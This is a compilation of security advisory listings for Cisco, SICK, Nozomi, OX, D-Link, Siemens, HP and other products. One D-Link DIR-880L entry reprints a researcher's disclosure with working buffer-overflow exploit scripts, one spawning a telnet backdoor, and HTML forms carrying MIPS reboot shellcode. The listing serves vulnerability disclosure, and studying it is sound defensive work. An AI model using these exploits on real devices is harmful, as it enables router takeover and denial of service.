cisco-sa-asaftd-http-file-huyx2jl4 Cisco Secure Firewall Adaptive Security Appliance and Secure Firewall Threat Defense Software VPN Web Server Denial of Service Vulnerability 2025-08-14T16:00:00+00:00 2025-08-14T16:00:00+00:00
cisco-sa-asaftd-dhcp-qj7ngs4n Cisco Secure Firewall Adaptive Security Appliance and Secure Firewall Threat Defense Software DHCP Denial of Service Vulnerability 2025-08-14T16:00:00+00:00 2025-08-14T16:00:00+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
sca-2025-0009 Vulnerabilities affecting SICK TDC-E210GC 2025-08-01T13:00:00.000Z 2025-08-01T13:00:00.000Z
sca-2025-0008 Multiple vulnerabilities in Endress+Hauser MEAC300-FNADE4 2025-07-03T13:00:00.000Z 2025-07-03T13:00:00.000Z
sca-2025-0007 Multiple vulnerabilities in SICK Field Analytics and SICK Media Server 2025-06-12T13:00:00.000Z 2025-06-12T13:00:00.000Z
sca-2025-0003 FreeRTOS Vulnerabilities have no impact on SICK Products 2025-02-28T00:00:00.000Z 2025-05-20T11:00:00.000Z
sca-2025-0006 Vulnerability affecting picoScan and multiScan 2025-04-28T13:00:00.000Z 2025-04-28T13:00:00.000Z
sca-2025-0005 Vulnerabilities in SICK Flexi Compact 2025-04-28T10:00:00.000Z 2025-04-28T10:00:00.000Z
sca-2025-0004 Critical vulnerabilities in SICK DL100-2xxxxxxx 2025-03-14T11:00:00.000Z 2025-03-14T11:00:00.000Z
sca-2025-0001 Multiple vulnerabilities in SICK MEAC300 2025-02-14T14:00:00.000Z 2025-02-21T14:00:00.000Z
sca-2025-0002 Vulnerability in SICK Lector8xx and SICK InspectorP8xx 2025-02-14T10:19:00.000Z 2025-02-14T10:19:00.000Z
sca-2024-0007 Vulnerability in SICK OLM 2024-12-31T00:00:00.000Z 2024-12-31T00:00:00.000Z
sca-2024-0006 Critical vulnerabilities in SICK InspectorP61x, InspectorP62x and TiM3xx 2024-12-06T00:00:00.000Z 2024-12-06T00:00:00.000Z
sca-2024-0005 Vulnerability in SICK Incoming Goods Suite 2024-11-19T00:00:00.000Z 2024-11-19T00:00:00.000Z
SCA-2024-0005 Vulnerability in SICK Incoming Goods Suite 2024-11-19T00:00:00.000Z 2024-11-19T00:00:00.000Z
sca-2024-0004 Third party vulnerabilities in SICK CDE-100 2024-11-07T12:00:00.000Z 2024-11-07T12:00:00.000Z
SCA-2024-0004 Third party vulnerabilities in SICK CDE-100 2024-11-07T12:00:00.000Z 2024-11-07T12:00:00.000Z
sca-2024-0003 Critical vulnerability in multiple SICK products 2024-10-17T13:00:00.000Z 2024-10-17T13:00:00.000Z
sca-2024-0002 Vulnerability in SICK MSC800 2024-09-11T23:00:00.000Z 2024-09-11T23:00:00.000Z
sca-2024-0001 Vulnerability in SICK Logistics Analytics Products and SICK Field Analytics 2024-01-29T00:00:00.000Z 2024-01-29T00:00:00.000Z
sca-2023-0011 Vulnerability in multiple SICK Flexi Soft Gateways 2023-10-23T11:00:00.000Z 2023-10-23T11:00:00.000Z
SCA-2023-0011 Vulnerability in multiple SICK Flexi Soft Gateways 2023-10-23T11:00:00.000Z 2023-10-23T11:00:00.000Z
sca-2023-0010 Vulnerabilities in SICK Application Processing Unit 2023-10-09T11:00:00.000Z 2023-10-09T11:00:00.000Z
SCA-2023-0010 Vulnerabilities in SICK Application Processing Unit 2023-10-09T11:00:00.000Z 2023-10-09T11:00:00.000Z
sca-2023-0008 Vulnerability in SICK SIM1012 2023-09-29T13:00:00.000Z 2023-09-29T13:00:00.000Z
SCA-2023-0008 Vulnerability in SICK SIM1012 2023-09-29T13:00:00.000Z 2023-09-29T13:00:00.000Z
sca-2023-0009 Vulnerability in Wibu-Systems CodeMeter Runtime affects multiple SICK products 2023-09-29T10:00:00.000Z 2023-09-29T10:00:00.000Z
SCA-2023-0009 Vulnerability in Wibu-Systems CodeMeter Runtime affects multiple SICK products 2023-09-29T10:00:00.000Z 2023-09-29T10:00:00.000Z
sca-2023-0007 Vulnerabilities in SICK LMS5xx 2023-08-25T11:00:00.000Z 2023-08-25T11:00:00.000Z
SCA-2023-0007 Vulnerabilities in SICK LMS5xx 2023-08-25T11:00:00.000Z 2023-08-25T11:00:00.000Z
sca-2023-0006 Vulnerabilities in SICK ICR890-4 2023-07-10T13:00:00.000Z 2023-07-10T13:00:00.000Z
SCA-2023-0006 Vulnerabilities in SICK ICR890-4 2023-07-10T13:00:00.000Z 2023-07-10T13:00:00.000Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
nn-2025:3-01 Incorrect authorization for traces request/download in CMC before 25.1.0 2025-08-26T11:00:00.000Z 2025-08-26T11:00:00.000Z
nn-2025:2-01 Privilege escalation in Guardian/CMC before 24.6.0 2025-06-10T11:00:00.000Z 2025-06-10T11:00:00.000Z
nn-2025:1-01 Authenticated RCE in update functionality in Guardian/CMC before 24.6.0 2025-06-10T11:00:00.000Z 2025-06-10T11:00:00.000Z
nn-2024_2-01 Incorrect authorization for Reports configuration in Guardian/CMC before 24.2.0 2024-09-11T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2024_1-01 DoS on IDS parsing of malformed Radius packets in Guardian before 23.4.1 2024-04-10T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2024:2-01 Incorrect authorization for Reports configuration in Guardian/CMC before 24.2.0 2024-09-11T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2024:1-01 DoS on IDS parsing of malformed Radius packets in Guardian before 23.4.1 2024-04-10T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_9-01 Authenticated SQL Injection on Query functionality in Guardian/CMC before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_8-01 Session Fixation in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_7-01 DoS via SAML configuration in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_6-01 Partial DoS on Reports section due to null report name in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_4-01 Stored Cross-Site Scripting (XSS) in Threat Intelligence rules in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_3-01 Authenticated Blind SQL Injection on alerts count in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_2-01 Authenticated Blind SQL Injection on sorting in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_17-01 Information disclosure via audit records for OpenAPI requests in Guardian/CMC before 23.4.1 2024-04-10T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_15-01 Sensitive data exfiltration via unsafe permissions on Windows systems in Arc before v1.6.0 2024-05-15T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_12-01 Check Point IoT integration: WebSocket returns assets data without authentication in Guardian/CMC before 23.3.0 2024-01-15T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_11-01 SQL Injection on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_10-01 DoS on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:9-01 Authenticated SQL Injection on Query functionality in Guardian/CMC before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:8-01 Session Fixation in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:7-01 DoS via SAML configuration in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:6-01 Partial DoS on Reports section due to null report name in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:4-01 Stored Cross-Site Scripting (XSS) in Threat Intelligence rules in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:3-01 Authenticated Blind SQL Injection on alerts count in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:2-01 Authenticated Blind SQL Injection on sorting in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:17-01 Information disclosure via audit records for OpenAPI requests in Guardian/CMC before 23.4.1 2024-04-10T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:15-01 Sensitive data exfiltration via unsafe permissions on Windows systems in Arc before v1.6.0 2024-05-15T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:12-01 Check Point IoT integration: WebSocket returns assets data without authentication in Guardian/CMC before 23.3.0 2024-01-15T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:11-01 SQL Injection on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
oxas-adv-2025-0001 OX App Suite Security Advisory OXAS-ADV-2025-0001 2025-01-27T00:00:00+01:00 2025-04-07T00:00:00+00:00
oxdc-adv-2024-0003 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0003 2024-09-10T00:00:00+02:00 2024-09-10T00:00:00+00:00
oxdc-adv-2024-0002 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0002 2024-09-10T00:00:00+02:00 2024-09-10T00:00:00+00:00
OXDC-ADV-2024-0003 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0003 2024-09-10T00:00:00+02:00 2024-09-10T00:00:00+00:00
OXDC-ADV-2024-0002 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0002 2024-09-10T00:00:00+02:00 2024-09-10T00:00:00+00:00
oxas-adv-2024-0005 OX App Suite Security Advisory OXAS-ADV-2024-0005 2024-07-08T00:00:00+02:00 2024-09-09T00:00:00+00:00
OXAS-ADV-2024-0005 OX App Suite Security Advisory OXAS-ADV-2024-0005 2024-07-08T00:00:00+02:00 2024-09-09T00:00:00+00:00
oxdc-adv-2024-0001 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0001 2024-09-02T00:00:00+02:00 2024-09-06T00:00:00+00:00
OXDC-ADV-2024-0001 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0001 2024-09-02T00:00:00+02:00 2024-09-06T00:00:00+00:00
oxas-adv-2024-0004 OX App Suite Security Advisory OXAS-ADV-2024-0004 2024-06-13T00:00:00+02:00 2024-08-19T00:00:00+00:00
oxas-adv-2024-0003 OX App Suite Security Advisory OXAS-ADV-2024-0003 2024-04-24T00:00:00+02:00 2024-08-19T00:00:00+00:00
OXAS-ADV-2024-0004 OX App Suite Security Advisory OXAS-ADV-2024-0004 2024-06-13T00:00:00+02:00 2024-08-19T00:00:00+00:00
OXAS-ADV-2024-0003 OX App Suite Security Advisory OXAS-ADV-2024-0003 2024-04-24T00:00:00+02:00 2024-08-19T00:00:00+00:00
oxas-adv-2024-0002 OX App Suite Security Advisory OXAS-ADV-2024-0002 2024-03-06T00:00:00+01:00 2024-05-06T00:00:00+00:00
OXAS-ADV-2024-0002 OX App Suite Security Advisory OXAS-ADV-2024-0002 2024-03-06T00:00:00+01:00 2024-05-06T00:00:00+00:00
oxas-adv-2024-0001 OX App Suite Security Advisory OXAS-ADV-2024-0001 2024-02-08T00:00:00+01:00 2024-04-25T00:00:00+00:00
OXAS-ADV-2024-0001 OX App Suite Security Advisory OXAS-ADV-2024-0001 2024-02-08T00:00:00+01:00 2024-04-25T00:00:00+00:00
oxas-adv-2023-0007 OX App Suite Security Advisory OXAS-ADV-2023-0007 2023-12-11T00:00:00+01:00 2024-02-16T00:00:00+00:00
OXAS-ADV-2023-0007 OX App Suite Security Advisory OXAS-ADV-2023-0007 2023-12-11T00:00:00+01:00 2024-02-16T00:00:00+00:00
oxas-adv-2023-0006 OX App Suite Security Advisory OXAS-ADV-2023-0006 2023-09-25T00:00:00+02:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0005 OX App Suite Security Advisory OXAS-ADV-2023-0005 2023-09-19T00:00:00+02:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0004 OX App Suite Security Advisory OXAS-ADV-2023-0004 2023-08-01T00:00:00+02:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0003 OX App Suite Security Advisory OXAS-ADV-2023-0003 2023-05-02T00:00:00+02:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0002 OX App Suite Security Advisory OXAS-ADV-2023-0002 2023-03-20T00:00:00+01:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0001 OX App Suite Security Advisory OXAS-ADV-2023-0001 2023-02-06T00:00:00+01:00 2024-01-22T00:00:00+00:00
oxas-adv-2022-0002 OX App Suite Security Advisory OXAS-ADV-2022-0002 2022-11-02T00:00:00+01:00 2024-01-22T00:00:00+00:00
oxas-adv-2022-0001 OX App Suite Security Advisory OXAS-ADV-2022-0001 2022-08-10T00:00:00+02:00 2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0006 OX App Suite Security Advisory OXAS-ADV-2023-0006 2023-09-25T00:00:00+02:00 2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0005 OX App Suite Security Advisory OXAS-ADV-2023-0005 2023-09-19T00:00:00+02:00 2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0004 OX App Suite Security Advisory OXAS-ADV-2023-0004 2023-08-01T00:00:00+02:00 2024-01-22T00:00:00+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description
var-202411-1650 D-LINK DI-8400 v16.07.26A1 was discovered to contain multiple remote command execution (RCE) vulnerabilities in the msp_info_htm function via the flag and cmd parameters. D-LINK DI-8400 is a router device from D-Link, USA, used for home and small business network connections. Remote attackers can exploit this vulnerability to execute arbitrary commands
var-202411-1640 Linksys E3000 is a powerful dual-band Wireless-N router from Linksys, an American company. There is a security vulnerability in diag_ping_start of Linksys E3000. A remote attacker can use this vulnerability to submit special requests and execute arbitrary commands in the context of the application.
var-202411-0543 A vulnerability has been identified in SIMATIC S7-PLCSIM V16 (All versions), SIMATIC S7-PLCSIM V17 (All versions), SIMATIC STEP 7 Safety V16 (All versions), SIMATIC STEP 7 Safety V17 (All versions < V17 Update 8), SIMATIC STEP 7 Safety V18 (All versions < V18 Update 5), SIMATIC STEP 7 V16 (All versions), SIMATIC STEP 7 V17 (All versions < V17 Update 8), SIMATIC STEP 7 V18 (All versions < V18 Update 5), SIMATIC WinCC Unified V16 (All versions), SIMATIC WinCC Unified V17 (All versions < V17 Update 8), SIMATIC WinCC Unified V18 (All versions < V18 Update 5), SIMATIC WinCC V16 (All versions), SIMATIC WinCC V17 (All versions < V17 Update 8), SIMATIC WinCC V18 (All versions < V18 Update 5), SIMOCODE ES V16 (All versions), SIMOCODE ES V17 (All versions < V17 Update 8), SIMOCODE ES V18 (All versions), SIMOTION SCOUT TIA V5.4 SP1 (All versions), SIMOTION SCOUT TIA V5.4 SP3 (All versions), SIMOTION SCOUT TIA V5.5 SP1 (All versions), SINAMICS Startdrive V16 (All versions), SINAMICS Startdrive V17 (All versions), SINAMICS Startdrive V18 (All versions), SIRIUS Safety ES V17 (All versions < V17 Update 8), SIRIUS Safety ES V18 (All versions), SIRIUS Soft Starter ES V17 (All versions < V17 Update 8), SIRIUS Soft Starter ES V18 (All versions), TIA Portal Cloud V16 (All versions), TIA Portal Cloud V17 (All versions < V4.6.0.1), TIA Portal Cloud V18 (All versions < V4.6.1.0). Affected products do not properly sanitize user-controllable input when parsing user settings. This could allow an attacker to cause a type confusion and execute arbitrary code within the affected application. SIMATIC S7-PLCSIM simulates S7-1200, S7-1500 and some other PLC derivatives, shipped as part of SIMATIC STEP 7. SIMATIC step7 (TIA Portal) is an engineering software for configuring and programming SIMATIC controllers. simmocode ES is the core software package for simmocode pro configuration, commissioning, operation and diagnostics. SINAMICS Startdrive commissioning software is the engineering tool for integrating SINAMICS drives in TIA Portal. TIA Portal is a PC software that provides the full range of Siemens digital automation services from digital planning and integrated engineering to transparent operation. TIA Portal Cloud makes it possible to use the main package and main option package of TIA Portal in a virtualized environment
var-201507-0645 D-Link is an internationally renowned provider of network equipment and solutions, including a variety of router equipment. D-Link is a D-Link company dedicated to the research, development, production and marketing of local area networks, broadband networks, wireless networks, voice networks and related network equipment. A buffer overflow vulnerability exists in D-Link due to the program not performing correct boundary checks on user-submitted input. An attacker could use this vulnerability to execute arbitrary code in the context of an affected device and may also cause a denial of service. The following products are affected: D-Link Ethernet Broadband Router. Failed exploits may result in denial-of-service conditions. ## Advisory Information Title: DIR-880L Buffer overflows in authenticatio and HNAP functionalities. Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink) CVE: None Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061 However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. ## Product Description DIR-880L -- Wireless AC1900 Dual-Band Gigabit Cloud Router. Mainly used by home and small offices. ## Vulnerabilities Summary Have come across 2 security issues in DIR-880 firmware which allows an attacker to exploit buffer overflows in authentication and HNAP functionalities. first 2 of the buffer overflows in auth and HNAP can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed. Also this exploit needs to be run atleast 200-500 times to bypass ASLR on ARM based devices. ## Details Buffer overflow in HNAP ---------------------------------------------------------------------------------------------------------------------- import socket import struct #Currently the address of exit function in libraray used as $PC buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + "\x10\xd0\xff\x76"+"B"*220 buf+= "\r\n" + "1\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.0.0.90", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- Buffer overflow in auth ---------------------------------------------------------------------------------------------------------------------- import socket import struct buf = "GET /webfa_authentication.cgi?id=" buf+="A"*408 buf+="\x44\x77\xf9\x76" # Retn pointer (ROP1) which loads r0-r6 and pc with values from stack buf+="sh;#"+"CCCC"+"DDDD" #R0-R2 buf+="\x70\x82\xFD\x76"+"FFFF"+"GGGG" #R3 with system address and R4 and R5 with junk values buf+="HHHH"+"\xF8\xD0\xF9\x76" # R6 with crap and PC address loaded with ROP 2 address buf+="telnetd%20-p%209092;#" #actual payload which starts telnetd buf+="C"+"D"*25+"E"*25 + "A"*80 # 131 bytes of extra payload left buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.0.0.90", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. * July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor * Nov 13, 2015: A public advisory is sent to security mailing lists. ## Credit This vulnerability was found by Samuel Huntley (samhuntley84@gmail.com) . ## Details # Ping buffer oberflow ---------------------------------------------------------------------------------------------------------------------- <!-- reboot shellcode Big Endian MIPS--> <html> <body> <form id="form5" name="form5" enctype="text/plain" method="post" action="http://192.168.100.14/ping_response.cgi"> <input type="text" id="html_response_page" name="html_response_page" value="tools_vct.asp&html_response_return_page=tools_vct.asp&action=ping_test&ping_ipaddr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%2A%BF%99%F4%2A%C1%1C%30AAAA%2A%BF%8F%04CCCC%2A%BC%9B%9CEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE%2A%BC%BD%90FFFFFFFFFFFFFFFF%3c%06%43%21%34%c6%fe%dc%3c%05%28%12%34%a5%19%69%3c%04%fe%e1%34%84%de%ad%24%02%0f%f8%01%01%01%0c&ping=ping"></td> <input type=submit value="submit"> </form> </body> </html> ---------------------------------------------------------------------------------------------------------------------- # Send email buffer overflow ---------------------------------------------------------------------------------------------------------------------- <!-- reboot shellcode Big Endian MIPS--> <html> <body> <form id="form5" name="form5" enctype="text/plain" method="post" action="http://192.168.100.14/send_log_email.cgi"> <input type="text" id="auth_active" name="auth_active" value="testy)%3b&log_email_from=test@test.com&auth_acname=sweetBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBIIII%2A%BF%99%F4%2A%C1%1C%30FFFF%2A%BF%8F%04DDDDCCCCBBBB%2A%BC%9B%9CCCC&auth_passwd=test1)&log_email_server=mail.google.com%3breboat%3b%23%23testAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAA&log_email_port=25&log_email_sender=ses@gmail.com%3brebolt%3b%23%23teYYYY%2A%BC%BD%90AAAAAAAAAAAAtest%3c%06%43%21%34%c6%fe%dc%3c%05%28%12%34%a5%19%69%3c%04%fe%e1%34%84%de%ad%24%02%0f%f8%01%01%01%0cAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAA&model_name=test&action=send_log_email&test=test"></td> <input type=submit value="submit"> </form> </body> </html> ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline
var-201807-0341 ABB Panel Builder 800 all versions has an improper input validation vulnerability which may allow an attacker to insert and run arbitrary code on a computer where the affected product is used. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of the IpAddress parameters of the ABB BeMMS OPC Driver. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code under the context of an administrator. ABB Panel Builder 800 is a web-based HMI (Human Machine Interface) system from ABB, Switzerland. Failed exploit attempts will result in denial-of-service conditions
var-202411-1422 D-Link DI-8200 16.07.26A1 is vulnerable to remote command execution in the msp_info_htm function via the flag parameter and cmd parameter. D-Link Systems, Inc. of di-8200 Firmware contains a command injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. D-Link DI-8200 is an enterprise-class router from D-Link, a Chinese company. No detailed vulnerability details are currently available
var-202411-1539 D-LINK DI-8003 v16.07.26A1 was discovered to contain a buffer overflow via the host_ip parameter in the ipsec_road_asp function. D-Link Systems, Inc. of di-8003 An out-of-bounds write vulnerability exists in firmware.Service operation interruption (DoS) It may be in a state. D-LINK DI-8003 is a router product produced by D-LINK. No detailed vulnerability details are currently provided
var-201103-0371 SAP Crystal Reports Server is a complete reporting solution for creating, managing, and delivering reports through the web or embedded enterprise applications. There is an input validation error in SAP Crystal Reports Server. The input passed to aa-open-inlist.jsp via the \"url\", \"sWindow\", \"BEGIN_DATE\", \"END_DATE\", \"CURRENT_DATE\" and \"CURRENT_SLICE\" parameters is missing before returning to the user. Filtering can lead to cross-site scripting attacks
var-202410-3364 In TP-Link TL-WDR7660 v1.0, the guestRuleJsonToBin function handles the parameter string name without checking it, which can lead to stack overflow vulnerabilities. TP-LINK TL-WDR7660 is a Gigabit router from TP-LINK of China. TP-LINK TL-WDR7660 version 1.0 has a buffer overflow vulnerability. Attackers can exploit this vulnerability to execute arbitrary code on the system or cause a denial of service
var-202411-1441 D-LINK DI-8003 v16.07.16A1 was discovered to contain a buffer overflow via the notify parameter in the arp_sys_asp function. D-Link Systems, Inc. of di-8003 An out-of-bounds write vulnerability exists in firmware.Service operation interruption (DoS) It may be in a state. D-Link DI-8400 is a wireless router from D-Link, a Chinese company. D-Link DI-8400 arp_sys_asp has a buffer overflow vulnerability, which can be exploited by remote attackers to submit special requests, causing the service program to crash or execute arbitrary code in the context of the application
var-201112-0173 The default configuration of the HP CM8060 Color MFP with Edgeline; Color LaserJet 3xxx, 4xxx, 5550, 9500, CMxxxx, CPxxxx, and Enterprise CPxxxx; Digital Sender 9200c and 9250c; LaserJet 4xxx, 5200, 90xx, Mxxxx, and Pxxxx; and LaserJet Enterprise 500 color M551, 600, M4555 MFP, and P3015 enables the Remote Firmware Update (RFU) setting, which allows remote attackers to execute arbitrary code by using a session on TCP port 9100 to upload a crafted firmware update. A vulnerability in certain Hewlett-Packard devices could allow a remote attacker to install unauthorized firmware on an affected system. HP Printers and Digital Senders are prone to a security-bypass vulnerability. The unauthorized firmware could also cause a Denial of Service to the device. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03102449 Version: 3 HPSBPI02728 SSRT100692 rev.3 - Certain HP Printers and HP Digital Senders, Remote Firmware Update Enabled by Default NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2011-11-30 Last Updated: 2012-01-09 Potential Security Impact: Remote firmware update enabled by default Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with certain HP printers and HP digital senders. References: CVE-2011-4161 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Please refer to the RESOLUTION below for a list of impacted products. A firmware update can be sent remotely to port 9100 without authentication. RESOLUTION The following steps can be taken to avoid unauthorized firmware updates: Update the firmware to a version that implements code signing Disable the Remote Firmware Update The code signing feature verifies that firmware updates are properly signed. This will prevent the installation of invalid firmware updates. Note: A firmware update may be required to allow the RFU to be disabled or to implement code signing. Code signing is not available on all the affected devices. Please refer to the following table. Firmware updates for any of the products can also be downloaded as follows. Browse to www.hp.com/go/support then: Select "Drivers & Software" Enter the product name listed in the table above into the search field Click on "Search" If the search returns a list of products click on the appropriate product Under "Select operating system" click on "Cross operating system (BIOS, Firmware, Diagnostics, etc.)" If the "Cross operating system ..." link is not present, select any Windows operating system from the list. Select the appropriate firmware update under "Firmware" HISTORY Version:1 (rev.1) - 30 November 2011 Initial release Version:2 (rev.2) - 23 December 2011 Code signing firmware available Version:3 (rev.3) - 9 January 2012 Combined tables Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430 Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAk8KykcACgkQ4B86/C0qfVl09ACg1m3AQDGq/VzvFgb4j6bj3fJU VnkAoO9oPSjyrVB07qLIBpcXALxLRRRg =mXzy -----END PGP SIGNATURE----- . However, the information is applicable to all the devices listed above. This revision, version 6, 